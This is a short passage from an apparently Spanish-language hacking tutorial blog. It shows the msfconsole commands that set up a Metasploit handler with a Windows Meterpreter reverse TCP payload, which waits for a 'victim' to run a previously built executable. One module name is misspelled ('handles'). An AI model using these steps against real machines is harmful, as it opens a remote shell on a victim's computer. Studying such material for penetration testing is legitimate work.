Ya tengamos el ejecutable, ahora lo vamos a dejar escuchando para que en cuanto la víctima ejecute el payload, se cree la conexión. Para ello entramos en msfconsole y ejecutamos lo sigiente:
# msfconsole
> use exploit/multi/handles
> set payload windows/meterpreter/reverse_tcp
> set lhost 192.168.1.99
> set lport 4444
> exploit
Y lo dejamos esperando a la respuesta del servidor.
Cap comentari:
Publica un comentari a l'entrada